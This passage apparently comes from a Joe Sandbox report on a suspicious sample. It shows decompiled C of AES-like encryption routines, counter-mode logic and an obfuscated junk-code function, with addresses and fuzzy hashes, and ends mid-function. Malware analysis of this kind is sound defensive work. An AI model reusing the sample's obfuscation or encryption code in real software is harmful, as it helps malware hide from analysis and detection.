						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t428 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t602 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t428 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t602 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t602 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t428 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t602 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t428 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t428 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t602 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t428 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t602 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				_t411 = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t428 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t602 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00;
				asm("rol edi, 0x8");
				 *_t358 =  *_t358 + _t411;
				asm("iretd");
				_t358[3] = _t411;
				return _t274;
			}

0x00382fb0
0x00382fbf
0x00382fc8
0x00382fd6
0x00382fda
0x00382fe3
0x00382ff4
0x00382ff7
0x00382ffc
0x00383005
0x00383013
0x00383018
0x00383021
0x00383031
0x00383051
0x00383054
0x00383066
0x0038306b
0x00383080
0x0038309d
0x003830a0
0x003830b1
0x003830c6
0x003830e6
0x003830e9
0x003830fb
0x00383119
0x00383136
0x00383139
0x0038314b
0x00383160
0x00383166
0x0038316e
0x0038316f
0x00383172
0x00383180
0x00383190
0x003831a2
0x003831b4
0x003831d0
0x003831e3
0x003831f0
0x00383201
0x00383218
0x0038323a
0x0038323d
0x0038324e
0x00383269
0x00383280
0x00383283
0x00383295
0x0038329d
0x003832b2
0x003832cf
0x003832d2
0x003832e3
0x00383307
0x00383317
0x0038331a
0x0038332c
0x00383344
0x00383347
0x0038335a
0x00383367
0x00383379
0x00383391
0x003833b4
0x003833b7
0x003833c9
0x003833de
0x003833e4
0x003833e4
0x003833e7
0x003833e7
0x00383180
0x0038344b
0x00383454
0x00383462
0x003834c0
0x003834c9
0x003834d7
0x00383539
0x00383542
0x0038354f
0x00383552
0x0038359e
0x003835aa
0x003835ad
0x003835b3
0x003835bb
0x003835bd
0x003835c0
0x003835c7

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: 2d6a9b59a148e2f220b72e28617bc0a31228b76a2fc6da092e6daab3a681f851
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: 94026E73E547164FE720DE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 0039E5C0 Relevance: .2, Instructions: 173
COMMONCrypto

Download Yara Rule

C-Code - Quality: 48%

			E0039E5C0(signed char __eax, signed int __ecx, char __edx, signed int __esi) {
				char _v3;
				signed char _t20;
				void* _t21;
				void* _t22;
				void* _t28;
				char _t39;
				signed int _t42;
				signed char _t45;
				signed int _t46;
				char _t48;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t70;

				_t60 = __esi;
				_t48 = __edx;
				_t42 = __ecx;
				_t20 = __eax;
				_t66 = _t70;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									do {
										do {
											L1:
											_t1 = _t20;
											_t20 =  *0x939ff7b7;
											 *0x939ff7b7 = _t1;
											 *0x8f83e7b0 =  *0x8f83e7b0 ^ _t42;
										} while ( *0x8f83e7b0 == 0);
										asm("rcr dword [0xc419e217], 0x65");
									} while (_t60 != 0x84e5c4bb);
									_push(0xdd634e75);
									asm("sbb ch, 0x18");
									asm("sbb ah, 0x2");
									 *0xd173aeb0 =  *0xd173aeb0 - _t20;
								} while ( *0xd173aeb0 < 0);
								asm("sbb esi, [0xddbd1c2f]");
								_t2 = _t42 &  *0x9d1616ef;
								_t42 =  *0xc02c16ef;
								 *0xc02c16ef = _t2;
								asm("rcl byte [0xa8e0cc32], 0x7d");
								_t70 = _t70 &  *0xc6a616ef;
								_t66 =  &_v3;
								_t48 = _t48 - 0xa8 +  *0xa8e0cc32;
							} while (( *0xc83916ef & _t70) != 0);
							_t66 =  &_v3;
							 *0x8b7a16ef = 0x000000b2 ^  *0x997775;
							_t70 = _t70 - 0xc68ff209 | 0xe0cc32c1;
							_t48 = 0xa8;
						} while ( *0x8b7a16ef != 0xc83816ef);
						asm("adc eax, [0x52173a7b]");
						_t21 = _t20 + 1;
						_push(_t21);
						asm("adc esi, 0xef45d88d");
						 *0x81d04116 =  *0x81d04116 >> 0x89;
						 *0x4052173a =  *0x4052173a >> 0x7e;
						 *0x81c42916 =  *0x81c42916 & 0xef45d88d;
						_t61 = _t60 &  *0x50405217;
						asm("ror dword [0xef45d88d], 0x72");
						_t22 = _t21;
						asm("adc ebp, [0x8daddd0f]");
						 *0x16ef45d8 = _t61;
						asm("scasb");
						asm("adc edi, [0x453d99a1]");
						 *0x32ee16ef =  *0x32ee16ef ^ _t66;
						asm("adc ebx, [0x1db40ffd]");
						asm("sbb [0xe0cc3283], ebp");
						asm("adc cl, 0xa8");
						asm("adc ebx, 0x6d2b16ef");
						_t45 = _t42 + 0x311087db ^ 0x0000001c;
						 *0xff16efa8 =  *0xff16efa8 | 0xffffffff9cba1da2 |  *0xa8e0cc32;
						asm("ror dword [0xc62b7093], 0xd5");
						_t63 = _t61 &  *0xddbe17ff | 0xcc32c5f7;
						 *0x16efa8e0 =  *0x16efa8e0 | _t45;
						asm("rcr byte [0x4fa34f2], 0xc6");
						asm("adc bh, 0xb0");
						asm("rcl dword [0xcc32b9d9], 0x5b");
						 *0xc0d601ee =  *0xc0d601ee << 0x23;
						 *0x16d24939 =  *0x16d24939 ^ _t22 + 0x2f8a16ef;
						 *0x9076a2f7 =  *0x9076a2f7 << 0x93;
						asm("stosb");
						asm("ror dword [0x16d24939], 0x6d");
						 *0x140b36b6 =  *0x140b36b6 + 0xa8;
						asm("rcl dword [0xefa8e0cc], 0xac");
						 *0x8ce2a816 =  *0x8ce2a816 & _t63;
						 *0xaece9d8d = _t66;
						_t39 =  *0x5f828ee2 +  *0xa8e0cc32;
						asm("ror byte [0xaf869af2], 0xcb");
						 *0x5fc3ccf9 =  *0x5fc3ccf9 - _t45;
						 *0x16d24939 =  *0x16d24939 + 0xffffffffef45d8c7;
						asm("rol byte [0xab9c4208], 0xbf");
						asm("sbb ebx, [0x32baf2c1]");
						asm("sbb [0xefa8e0cc], ebx");
						asm("sbb ebp, [0x983e0416]");
						asm("cmpsw");
						_t46 = _t45 - 0xbed3f5bd;
						 *0x16d24939 =  *0x16d24939 << 0x54;
						 *0x71c621c =  *0x71c621c + 0xa8;
						asm("movsb");
						asm("rcl dword [0xcc32c1db], 0x2");
						 *0x16efa8e0 =  *0x16efa8e0 << 6;
						 *0x7c73a2fe = _t63;
						asm("adc edx, [0xc4a8009a]");
						asm("rcr byte [0xef45d8a8], 0x83");
						asm("sbb ebx, [0xa0f4be16]");
						 *0x33947a16 =  *0x33947a16 >> 0xca;
						asm("ror dword [0xc1dec32e], 0x5b");
						asm("rcr byte [0xa8e0cc32], 0x60");
						_t70 = (0xe0cc32bf |  *0x32ccebb8) +  *0x470c16ef;
						 *0xecc9b4a0 = _t46;
						asm("rol dword [0x395fc2cc], 0x51");
						 *0xc48616d2 = _t39;
						 *0x16efa8 =  *0x16efa8 << 0x53;
						asm("lodsb");
						_t42 = _t46;
						_t20 =  *0x241016d2;
						_t48 =  *0xe0cc32c1 + 0xfb45494;
						_push( *0xd88daddd);
						_t66 =  &_v3;
						_t60 =  *0x7c73a2fe |  *0xe04c16ef;
					} while (_t60 > 0);
					asm("rol dword [0xa8008977], 0x51");
					 *0x45d8a8c4 =  *0x45d8a8c4 - _t39;
					asm("sbb ecx, [0x9e3f16ef]");
					asm("rol dword [0xf9e2bc0], 0x2b");
					 *0x8f16ef88 = _t48;
					asm("adc edi, 0x16ef45d8");
					asm("sbb edx, [0x2bbc121f]");
					_t60 = _t60 +  *0xb2a10f9e;
					_push( *0xef8840ec);
					_t20 = (_t20 &  *0xa8c4a800) -  *0xccf0cc31;
					asm("sbb dh, 0xd2");
					 *0x33941616 =  *0x33941616 >> 0xd4;
					 *0xa8e0cc32 = 0x9fe24b16;
					asm("sbb [0xe26216ef], edx");
					asm("rcl dword [0x9a8081], 0x32");
					asm("adc [0xd8a8c4a8], cl");
					_t66 =  &_v3;
					 *0xd6b616ef =  *0xd6b616ef >> 0x7c;
				} while ( *0xd6b616ef < 0);
				_push( *0x52173a78);
				_t28 = _t20 + 1;
				_push(_t28);
				return _t28 -  *0xef45d88d | 0x00000016;
			}

0x0039e5c0
0x0039e5c0
0x0039e5c0
0x0039e5c0
0x0039e5c1
0x0039e5c1
0x0039e5c3
0x0039e5c3
0x0039e5c3
0x0039e5c3
0x0039e5c3
0x0039e5c3
0x0039e5c3
0x0039e5c3
0x0039e5c3
0x0039e5c3
0x0039e5c3
0x0039e5c9
0x0039e5c9
0x0039e5d7
0x0039e5de
0x0039e5e7
0x0039e5ec
0x0039e5ef
0x0039e5f2
0x0039e5f2
0x0039e60a
0x0039e619
0x0039e619
0x0039e619
0x0039e627
0x0039e62e
0x0039e634
0x0039e63b
0x0039e641
0x0039e659
0x0039e65a
0x0039e666
0x0039e66c
0x0039e66e
0x0039e67a
0x0039e680
0x0039e681
0x0039e682
0x0039e688
0x0039e68f
0x0039e69c
0x0039e6a5
0x0039e6ab
0x0039e6b8
0x0039e6bc
0x0039e6c2
0x0039e6c8
0x0039e6d3
0x0039e6d9
0x0039e6df
0x0039e6e5
0x0039e6eb
0x0039e6ee
0x0039e6f4
0x0039e713
0x0039e719
0x0039e720
0x0039e726
0x0039e72c
0x0039e733
0x0039e736
0x0039e749
0x0039e751
0x0039e757
0x0039e75e
0x0039e765
0x0039e76c
0x0039e778
0x0039e77f
0x0039e785
0x0039e78b
0x0039e7a9
0x0039e7b0
0x0039e7b6
0x0039e7bc
0x0039e7c3
0x0039e7c9
0x0039e7cf
0x0039e7d5
0x0039e7d7
0x0039e7de
0x0039e7e5
0x0039e7eb
0x0039e7ec
0x0039e7f3
0x0039e7fa
0x0039e800
0x0039e806
0x0039e80d
0x0039e821
0x0039e828
0x0039e82f
0x0039e836
0x0039e83c
0x0039e842
0x0039e84a
0x0039e85c
0x0039e869
0x0039e870
0x0039e871
0x0039e877
0x0039e87d
0x0039e883
0x0039e884
0x0039e884
0x0039e891
0x0039e898
0x0039e89e
0x0039e8a4
0x0039e8b1
0x0039e8c3
0x0039e8c9
0x0039e8cf
0x0039e8d5
0x0039e8e1
0x0039e8ed
0x0039e8f0
0x0039e8fd
0x0039e903
0x0039e909
0x0039e910
0x0039e916
0x0039e917
0x0039e917
0x0039e924
0x0039e92a
0x0039e92b
0x0039e934

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7717ebe5cfed9669cefb85dc77c12bd925c4c774b7d09bd006a24f89b0f777f6
Instruction ID: 8ddf5703f84a5c5dad72106904d53c5ca36b555ff09368368e3b4db16bb0fba9
Opcode Fuzzy Hash: 7717ebe5cfed9669cefb85dc77c12bd925c4c774b7d09bd006a24f89b0f777f6
Instruction Fuzzy Hash: 5181203284C395DFDB16DF78E8967423F72E746720B0902CDD8A25B2D2D33125AACB85

Uniqueness

Uniqueness Score: -1.00%

Function 00382D90 Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00382D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}

0x00382d93
0x00382d98
0x00382da0
0x00382da9
0x00382db3
0x00382dba
0x00382dc3
0x00382dce
0x00382dd6
0x00382ddf
0x00382dea
0x00382df0
0x00382df5
0x00382dfe
0x00382e09
0x00382e11
0x00382e1a
0x00382e25
0x00382e2d
0x00382e36
0x00382e41
0x00382e49
0x00382e52
0x00382e5d
0x00382e65
0x00382e6e
0x00382e80
0x00382e83
0x00382f9f
0x00382fa4
0x00382e89
0x00382e89
0x00382e8c
0x00382e8e
0x00382e91
0x00382e91
0x00382ef6
0x00382efb
0x00382efd
0x00382f03
0x00382f05
0x00382f0b
0x00382f0d
0x00382f10
0x00382f16
0x00000000
0x00000000
0x00382f72
0x00382f78
0x00382f7a
0x00382f80
0x00382f82
0x00382f87
0x00382f88
0x00382f8b
0x00382f8e
0x00382f91
0x00382f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00382f97
0x00382fae
0x00382fae
0x00000000

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 277c9f3d2baf532d143830005d3dafc7b7cca68b7b775bbf1e8ebe98425e504e
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: 725161B3E14A214BD3188E09CC40636B792FFD8312B5F81BADD199B357CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 003812FB Relevance: .1, Instructions: 137
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E003812FB(void* __ecx, intOrPtr* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int* _a12, unsigned int _a16, unsigned int _a20) {
				intOrPtr _v8;
				signed int _v9;
				signed int _v10;
				signed int _v11;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				unsigned int _t45;
				signed int* _t60;
				void* _t62;
				signed int* _t65;
				void* _t67;
				signed char _t70;
				signed int* _t84;
				signed int* _t92;
				void* _t98;
				signed int* _t100;
				void* _t102;
				void* _t104;
				void* _t105;

				asm("loope 0xffffffcf");
				_t102 = _t104;
				_t45 = _a16;
				_t65 = _a12;
				_t105 = _t104 - 0x24;
				_t60 = _a20;
				_t92 = _t65;
				if(_t45 != 0) {
					_v24 =  *__edx;
					_v20 =  *((intOrPtr*)(__edx + 4));
					_t45 = _t45 >> 4;
					_v16 =  *((intOrPtr*)(__edx + 8));
					_v12 =  *(__edx + 0xc);
					if(_t45 != 0) {
						_t84 = _t60;
						_t100 =  &(_t84[3]);
						_v8 = _t65 - _t84;
						_a20 = _t45;
						do {
							E00383610(_a4, _a8,  &_v24, _t60);
							 *_t60 =  *_t60 ^  *_t92;
							 *(_t100 - 8) =  *(_t100 - 8) ^ _t92[1];
							 *(_t100 - 4) =  *(_t100 - 4) ^ _t92[2];
							 *_t100 =  *_t100 ^  *(_v8 + _t100);
							_t45 = ((((_v12 & 0x000000ff) << 0x00000008 | _v11 & 0x000000ff) << 0x00000008 | _v10 & 0x000000ff) << 0x00000008 | _v9 & 0x000000ff) + 1;
							_v12 = _t45 >> 0x18;
							_t105 = _t105 + 0x10;
							_t92 =  &(_t92[4]);
							_t60 =  &(_t60[4]);
							_t100 =  &(_t100[4]);
							_t31 =  &_a20;
							 *_t31 = _a20 - 1;
							_v11 = _t45 >> 0x10;
							_v10 = _t45 >> 8;
							_v9 = _t45;
						} while ( *_t31 != 0);
						_t65 = _a12;
					}
					_t67 = _t65 - _t92 + _a16;
					_t98 = _t67;
					if(_t67 != 0) {
						E00383610(_a4, _a8,  &_v24,  &_v40);
						_t45 = 0;
						if(_t98 != 0) {
							_t62 = _t60 - _t92;
							do {
								_t70 =  *(_t102 + _t45 - 0x24) ^  *_t92;
								_t45 = _t45 + 1;
								 *(_t62 + _t92) = _t70;
								_t92 =  &(_t92[0]);
							} while (_t45 < _t98);
						}
					}
				}
				return _t45;
			}

0x003812fe
0x00381301
0x00381303
0x00381306
0x00381309
0x0038130d
0x00381311
0x00381315
0x0038131e
0x00381324
0x0038132d
0x00381330
0x00381333
0x00381338
0x0038133e
0x00381342
0x00381345
0x00381348
0x00381350
0x0038135d
0x00381364
0x00381369
0x0038136f
0x00381378
0x00381399
0x0038139f
0x003813ac
0x003813af
0x003813b2
0x003813b5
0x003813b8
0x003813b8
0x003813bb
0x003813be
0x003813c1
0x003813c1
0x003813c6
0x003813c6
0x003813cb
0x003813ce
0x003813d0
0x003813e2
0x003813ea
0x003813ee
0x003813f0
0x003813f2
0x003813f6
0x003813f8
0x003813f9
0x003813fc
0x003813fd
0x003813f2
0x003813ee
0x00381401
0x00381407

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cd6ad57f16a8555599adf732742bcacab50b55884b1f22ac3cdbc3e767d5f16
Instruction ID: a6382dc6f3293887d7d98321ce582631d4a65bb4c85b717b163e7060061e1f0c
Opcode Fuzzy Hash: 1cd6ad57f16a8555599adf732742bcacab50b55884b1f22ac3cdbc3e767d5f16
Instruction Fuzzy Hash: 2851A475A0025AAFCB05DF6DD4818AEFBF5FF88300B15C6A9E855A7301D270EA51CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00381030 Relevance: .1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00381030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}

0x00381030
0x0038105b
0x0038105d
0x00381063
0x00381065
0x00381065
0x00381071
0x00381076
0x0038107c
0x003810ac
0x003810ae
0x003810b4
0x003810ba
0x003810bc
0x003810bc
0x003810cb
0x003810d0
0x003810d6
0x00381101
0x00381103
0x00381109
0x0038110f
0x00381111
0x00381111
0x00381120
0x00381128
0x0038112b
0x0038114f
0x00381156
0x0038115d
0x00381169
0x0038116c
0x0038116f
0x00381173

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: a7aedac624926f36c2a61e20a2a389e73cb78a07ec480bc60e767de8c76b34ac
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: B7318F516587F10ED30E836D08BDA75AEC18E9720174EC2EEDADA6F2F3C0888408D3A1

Uniqueness

Uniqueness Score: -1.00%

Function 0039C3D8 Relevance: .0, Instructions: 42
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0039C3D8(signed int* __eax, signed int __ecx, intOrPtr _a4) {
				intOrPtr _t12;
				unsigned int _t23;
				intOrPtr _t25;
				void* _t28;
				intOrPtr _t33;

				_t23 = __ecx & __eax[0xb];
				if( *__eax * 0x56 != 0) {
					asm("adc eax, 0x7ffe001c");
					do {
					} while (__eax != _t28);
					return (_t23 << 0x00000012 ^ _t23 >> 0x00000007) & 0x0007ffff ^ _t23 << 0x00000012 ^ _t23 >> 0x0000000d ^ 0x0618d8cb;
				} else {
					_t12 =  *0x7ffe0018;
